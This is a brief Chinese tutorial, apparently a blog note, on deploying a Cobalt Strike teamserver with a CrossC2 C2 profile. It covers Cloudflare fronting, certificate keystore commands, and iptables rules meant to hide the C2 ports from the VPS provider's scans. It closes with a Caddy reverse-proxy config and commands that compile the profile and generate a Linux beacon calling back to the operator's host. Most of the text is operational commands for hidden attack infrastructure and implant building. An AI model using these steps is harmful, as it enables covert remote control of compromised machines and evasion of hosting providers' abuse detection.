c2profile上线

使用c2profile启动teamserver

下载使用c2profile
本文使用的c2profile为https://github.com/Richard-Tang/CrossC2-C2Profile
编辑profile文件以及c文件中对应的host
修改profile文件中关于证书的部分

cdn

本文使用的为cloudflare
需要在规则中添加规则，对所有js文件的缓存实行绕过

证书

生成p12
openssl pkcs12 -export -in server.pem -inkey server.key -out [siteName].p12 -name [siteName] -passout pass:[passwd]
生成store
keytool -importkeystore -deststorepass 123456 -destkeypass 123456 -destkeystore [siteName].store -srckeystore [siteName].p12 -srcstoretype PKCS12 -srcstorepass [passwd] -alias [siteName]

规避vps服务商限制

启用防火墙

为了防止被vps运营商从ip扫描到特征，用防火墙禁止掉从外部访问端口，只允许从反代域名访问

//允许源地址127.0.0.1访问8443端口
iptables -A INPUT -s 127.0.0.1 -p tcp --dport 8443 -j ACCEPT
//拒绝8443端口访问
iptables -A INPUT -p tcp --dport 8443 -j DROP
//允许源地址127.0.0.1访问8080端口
iptables -A INPUT -s 127.0.0.1 -p tcp --dport 8080 -j ACCEPT
//拒绝8080端口访问
iptables -A INPUT -p tcp --dport 8080 -j DROP

配置caddy

[site]:8443 {
        tls /root/server.pem /root/server.key //证书位置
        reverse_proxy https://127.0.0.1:8443 { //https listener
                transport http {
                        tls
                        tls_insecure_skip_verify
                }
        }
}

[site]:80 { //http listener
        reverse_proxy http://127.0.0.1:8080
}

生成执行文件

编译so文件
gcc c2profile.c -fPIC -shared -o CrossC2-C2Profile.so
生成可执行文件
./genCrossC2.Linux [host] [port] [cobaltstrike.beacon_keys] CrossC2-C2Profile.so Linux x64 ./test